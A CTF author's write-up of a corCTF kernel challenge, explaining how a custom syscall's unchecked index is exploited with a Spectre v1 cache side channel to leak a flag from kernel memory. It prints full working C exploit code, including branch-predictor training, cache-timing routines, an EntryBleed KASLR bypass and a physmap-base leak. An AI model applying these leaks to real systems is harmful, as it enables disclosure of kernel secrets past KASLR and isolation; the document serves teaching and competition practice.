Following the theme of corCTF 2023, I wanted to release another exploitation challenge that connects kernel internals and modern x86_64 micro-architectural attacks. For this year, the players were presented with the following new syscall on Linux version 6.9.0.
char corctf_note[0x10] = {0}; SYSCALL_DEFINE2(corctf_write_note, char *, addr, size_t, size) { if (size > sizeof(corctf_note) - 1) return -EINVAL; return copy_from_user(corctf_note, addr, size); } SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride) { uint64_t off = corctf_note[idx1]; if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) { return copy_to_user(addr + (off << stride), corctf_note + idx2, 1); } else { return -EINVAL; } }
The kernel only ran off of an initramfs with the following QEMU boot command:
#!/bin/sh qemu-system-x86_64 \ -s \ -m 512 \ -smp 1 \ -nographic \ -kernel "bzImage" \ -append "console=ttyS0 loglevel=3 panic=-1 oops=panic clearcpuid=smap pti=on no5lvl" \ -no-reboot \ -netdev user,id=net \ -cpu host \ -initrd "./initramfs.cpio.gz" \ -enable-kvm
As mentioned to the players, the challenge was hosted on an i5-8250U,
an 8th generation Intel CPU (though worked locally on 9th and 10th
generation CPUs). I also made it clear to players to set the Linux scaling_governor
to performance
(echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
) - the intended micro-architectural side-channel exploit struggled to work reliably when in powersave
mode.
Based on the syscall implementation, there is a pretty clear OOB read bug in corctf_read_note
.
Hopefully, no one tried to rely solely on that vulnerability to write
an LPE exploit. I’m pretty sure this can only result in a DOS bug due to
oops=panic
, but if you can pwn the Linux kernel with only one use of this primitive, please contact me.
This syscall implementation’s also has a side-channel problem. The access of the user controlled buffer in copy_to_user
depends on a value derived from a user controlled index. Attackers can deduce the value of any memory location relative to corctf_note
with a cache side-channel through the unchecked index. If one were to
evict this entire user buffer from the CPU cache hierarchy beforehand,
then this syscall could bring regions of it back into the cache with the
off
dependent access. An attacker can then measure access times over its buffer to determine the original value of off
based off of which user buffer region is the fastest to access. This gives away memory value information as the value of off
comes from the unchecked index into corctf_note
.
One might wonder how the user-buffer would even be accessed given an OOB index. Afterall, there is a conditional check that blocks OOB accesses afterwards. This is where the original insight from Spectre v1 comes in. Modern CPUs are extremely aggressive with optimizations and execute as many instructions and as far in advance as possible - it’s perfectly fine to execute instructions out of order internally as long as the final results remain architecturally correct. Conditional branches awaiting resolution can’t just halt the entire pipeline, so modern micro-architectures employ a branch predictor that assumes a certain direction based on history at the branch address. Sometimes, the prediction is wrong, so the CPU will have to rollback state, but micro-architectural state such as caching are not rolled back (it would be very hard to do so without seriously hindering performance).
In this case, if one were to train this branch to always take the copy_to_user
path, then an OOB index will cause this path to be taken transiently.
The cache side-channel becomes a race condition between branch
resolution (which depends on calls to strlen
on corctf_note
) and the caching of an off
dependent user buffer address (which depends on the speed of the shift
calculation and the MMU resolution of the buffer’s virtual address).
One common misconception I observed during the CTF was people
thinking that KPTI and modern kernel mitigations have fixed Spectre v1.
This is simply not true, as KPTI was meant to address Meltdown (not
completely though), and Spectre v1 cannot be mitigated as branch
prediction is a fundamental modern CPU optimization. As discussed in a Linux kernel document, one can mitigate Spectre with the help of the nospec
macro family (like array_index_nospec
)
that helps stop speculative execution or with the usage of certain
barriers. None of that exists in the custom syscall above. Technically, I
believe the clac
and stac
instructions used by usercopy functions to disable and re-enable SMAP have barrier like semantics, but I disabled SMAP in the kernel boot params above.
One last piece of the puzzle remains - how can we use Spectre v1 to leak the flag? Well, initramfs is always loaded in RAM, and its loaded very early on so that it isn’t affected by randomization (at least based on my observations). Given a kernel KASLR leak and a physmap base leak, we can then compute the offset necessary to side-channel out the flag.
I created the following primitives to setup a Spectre v1 based side-channel given a user-controlled buffer.
Since we control the buffer, the easiest way to flush it from the cache on x86_64 is through the clflush instruction.
void clflush(void *addr) { asm volatile(INTEL( "clflush [%[addr]];" )::[addr]"r"(addr):); } void flush_buffer(void *addr, size_t size) { for (off_t i = 0; i < size; i += LINE_SIZE) { clflush(addr + i); } }
To time accesses, I rely on the rdtscp
instruction, and use memory fences to help ensure accuracy.
static inline uint64_t time_access(void *addr) { uint64_t time; asm volatile(INTEL( "mfence;" "rdtscp;" "lfence;" "mov rbx, rax;" "mov rax, %[addr];" "mov rax, qword ptr [rax];" "rdtscp;" "lfence;" "sub rax, rbx;" "mov %[time], rax;") :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi"); return time; }
Now for the main “Spectre” function to train the branch predictor:
static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound) { for (int i = 0; i < strlen(tlb_smart_write); i++){ corctf_read(buffer, i); } for (int i = 0; i < train; i++){ corctf_read(buffer, 0xd); } flush_buffer((void *)buffer, MAP_SIZE); asm volatile ("mfence;"); corctf_read(buffer, idx); return get_time(buffer, offset); }
I set up tlb_smart_write
to be \x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi
(apologies for the zoomer brainrot, I was under an extreme time crunch
this year for corCTF development). The first for loop thus has the
syscall use each of those values as the offset into the user-buffer - as
you will see later, I indexed into the user buffer by strides of 128
bytes (which provided cleaner results than 64 byte strides for me), so
this acts as a mechanism to have the buffer virtual addresses resolved
in the TLB beforehand (which would help win the aforementioned Spectre
race window). Despite kPTI being on, modern Intel CPUs have the PCID
feature as a performance optimization, so those addresses are not flushed from the TLB on user kernel transitions.
Afterwards, I trained the branch predictor for a few times, before flushing the entire user buffer from the whole cache hierarchy, triggering a mis-speculation with an evil index, and timing the access to a pre-specified offset in the buffer. Note that the index is to the memory location we want to leak, and offset is an address in the user buffer we are currently timing for data collection.
With the above primitives, I created the following side-channel primitive:
uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound) { uint64_t time[CHAR_SPACE] = {0}; for (int times = 0; times < ITERS; times++) { for (uint32_t i = 0; i < bound; i++) { uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound); if (t < THRESHOLD) time[i]++; } } uint64_t max_val = 0, max = -1; for (int i = 0; i < bound; i++) { if (time[i] > max_val) { max = i; max_val = time[i]; } } if (max != -1) { for (int i = 0; i < bound; i++) { printf("0x%02x: %lu, ", i, time[i]); if ((i + 1) % 16 == 0) { puts(""); } } puts(""); } return max; }
It is always better to use a threshold scoring technique as seen
above in micro-architectural side-channels, as averages are too
susceptible to noise and outliers. While this might not be an issue
because DRAM has quite a large timing difference when compared to a
generic cached access, a threshold scoring technique would definitely
fair much better if clflush
was unavailable. Rather than
evicting the buffer from the L3 cache into DRAM by “filling” the L3
cache between 1-2 times (as caches are not truly LRU and have other
heuristics), we can just evict the buffer from L1 and L2 cache, which
takes substantially less accesses. The L2 to L3 timing difference can
then be noticed through a threshold metric.
Now, armed with all these primitives, we can construct a Spectre v1 exploit to leak the flag from the filesystem cache.
To leak kernel physmap base, we can just side-channel out the contents of page_offset_base
, which will be at a fixed offset from corctf_note
as both are in the kernel .data section. I noticed that page_offset_base
‘s
address also seems to be cached (at least in the TLB), as the kernel is
probably using addresses near it quite frequently. A similar idea can
be done with a kernel text/data pointer to leak KASLR. However, I opted
for an easier approach with the EntryBleed KASLR bypass side-channel,
which I discuss in this post and in this paper.
With both address leaks in hand and knowledge of the file offset from physical memory base (which you determine beforehand through a memory search in QEMU monitor mode), the flag can be leaked. Here is the final exploit:
uint8_t tlb_smart_write[0x10] = "\x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi"; void fail(char *msg) { perror(msg); exit(1); } uint64_t entrybleed(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } uint64_t leak_syscall_entry(void) { uint64_t data[ARR_SIZE] = {0}; uint64_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { for (uint64_t idx = 0; idx < ARR_SIZE; idx++) { uint64_t test = SCAN_START + idx * STEP; syscall(104); uint64_t time = entrybleed(test); if (i >= DUMMY_ITERATIONS) data[idx] += time; } } for (int i = 0; i < ARR_SIZE; i++) { data[i] /= ITERATIONS; if (data[i] < min) { min = data[i]; addr = SCAN_START + i * STEP; } } return addr; } uint64_t leak_kaslr(void) { return leak_syscall_entry() - entry_SYSCALL_64_offset; } long corctf_write(char *addr, uint64_t size) { return syscall(__NR_CORCTF_WRITE, addr, size); } long corctf_read(char *addr, uint64_t idx) { return syscall(__NR_CORCTF_READ, addr, idx, 0, STRIDE_SHIFT); } void clflush(void *addr) { asm volatile(INTEL( "clflush [%[addr]];" )::[addr]"r"(addr):); } void flush_buffer(void *addr, size_t size) { for (off_t i = 0; i < size; i += LINE_SIZE) { clflush(addr + i); } } static inline uint64_t time_access(void *addr) { uint64_t time; asm volatile(INTEL( "mfence;" "rdtscp;" "lfence;" "mov rbx, rax;" "mov rax, %[addr];" "mov rax, qword ptr [rax];" "rdtscp;" "lfence;" "sub rax, rbx;" "mov %[time], rax;") :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi"); return time; } static inline uint64_t get_time(char *buffer, off_t offset) { return time_access(buffer + offset); } static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound) { for (int i = 0; i < strlen(tlb_smart_write); i++){ corctf_read(buffer, i); } for (int i = 0; i < train; i++){ corctf_read(buffer, 0xd); } flush_buffer((void *)buffer, MAP_SIZE); asm volatile ("mfence;"); corctf_read(buffer, idx); return get_time(buffer, offset); } uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound) { uint64_t time[CHAR_SPACE] = {0}; for (int times = 0; times < ITERS; times++) { for (uint32_t i = 0; i < bound; i++) { uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound); if (t < THRESHOLD) time[i]++; } } uint64_t max_val = 0, max = -1; for (int i = 0; i < bound; i++) { if (time[i] > max_val) { max = i; max_val = time[i]; } } if (max != -1) { for (int i = 0; i < bound; i++) { printf("0x%02x: %lu, ", i, time[i]); if ((i + 1) % 16 == 0) { puts(""); } } puts(""); } return max; } uint8_t leak_byte_helper(char *buffer, uint64_t offset, uint64_t bound) { uint64_t result = -1; printf("Attemping to leak offset 0x%lx\n", offset); while (result == -1) { result = sidechannel(buffer, TRAIN, offset, bound); if (result == -1) printf("retrying for offset 0x%lx\n", offset); } printf("Leaked: 0x%lx\n", result); return result; } uint8_t leak_byte(char *buffer, uint64_t offset, uint64_t bound) { uint64_t first_leak = 0xdeadbabe; uint64_t second_leak = 0xdeadb00b; while (first_leak != second_leak) { first_leak = leak_byte_helper(buffer, offset, bound); second_leak = leak_byte_helper(buffer, offset, bound); if (first_leak != second_leak) { printf("mismatch in leak values: 0x%lx 0x%lx. retrying\n", first_leak, second_leak); } } return first_leak; } uint64_t leak_physmap(char *buffer, uint64_t offset) { uint64_t qword = 0; for (int i = 3; i < 6; i++) { qword |= ((uint64_t)leak_byte(buffer, offset + i, 256)) << (i * 8); } qword |= 0xffff000000000000ull; return qword; } void main() { char *flag = malloc(MAX_FLAG_LEN); char *buffer = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); if (!buffer || !flag) { fail("buffer allocation failed"); } memset(flag, 0, MAX_FLAG_LEN); strcpy(flag, "corctf{"); uint64_t kaslr_base = leak_kaslr(); uint64_t note = kaslr_base + NOTE_OFFSET; printf("KASLR base: 0x%lx\n", kaslr_base); printf("note addr: 0x%lx\n", note); printf("page offset base: 0x%lx\n", note + NOTE_TO_POB); corctf_write(tlb_smart_write, strlen(tlb_smart_write)); // bottom 3 bytes always 0, speed it up a bit uint64_t physmap_base = leak_physmap(buffer, NOTE_TO_POB); // uint64_t physmap_base = 0xffff888000000000ull; printf("physmap: 0x%lx\n", physmap_base); uint64_t flag_offset = 0x1f556000ull; // in case another page allocation happened beforehand while (leak_byte(buffer, physmap_base + flag_offset - note, 256) != flag[0]) { puts("wrong first flag char, incrementing flag_offset"); flag_offset += 0x1000; } int i = strlen(flag); uint8_t temp = 0; while ((temp = leak_byte(buffer, physmap_base + flag_offset + i - note, 0x80)) != '}') { flag[i++] = temp; } flag[i] = '}'; printf("flag: %s\n", flag); }
The flag takes about 5-10 minutes to fully leak, but that’s with some form of optimization such as knowledge of the flag format and the range of physmap under 4 level paging.
I originally had a harder version of this challenge too, themed around being bug free rather than a DOS bug.
The syscall looked like this:
SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride) { if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) { uint64_t off = corctf_note[idx1] << stride; return copy_to_user(addr + off, corctf_note + idx2, 1); } else { return -EINVAL; } }
Now, there would never be any OOB access. However, this is a harder
side-channel to perform - since the file cache address is not in the CPU
cache (and perhaps the TLB as well), it would have been extremely
difficult for speculative execution to progress deep enough to leave a
cache side-effect for the user buffer. One probable way to go about this
is to prolong the speculation window by causing an eviction of corctf_note
from the L3 cache and TLB, but the side-channel would probably take too
long at that point given normal system noise. I opted to keep the file
contents in cache with a “flag verifier daemon” - this challenge ended
up working but the side-channel success rate was still much lower. Since
it didn’t really introduce any new concepts and just required a player
to perform more fine-tuning, I opted for the easier version of the
challenge instead.
Overall, I thought this was a really nifty challenge to write and hoped to bring something refreshing to the pwnable category in CTFs. I would like to give a huge shoutout to sampriti for taking first blood on this challenge. Zolutal from Shellphish claimed the second and last solve on this challenge.
Some other challenges I wrote this year for corCTF included trojan-turtles, an L2 guest to L1 hypervisor KVM escape, and vmquack’s combinator in collaboration with anematode, a functional programming VM built around normal evaluation of untyped lambda calculus. I didn’t make a writeup for the latter one as the three solves were pretty much all just pattern match and replace, which I somewhat expected to be the case. It’s a shame though since it involved the highest development effort. I was inspired by this article to write a Scheme to lambda calculus compiler, but the ultimate bottleneck for the crackme’s complexity was the poor runtime reduction performance.
I am looking forward to what comes next for development in corCTF
2025! Feel free to let me know if you have any questions or see any
mistakes, and hopefully, I’ll see some of you all for the Defcon Finals
afterparty.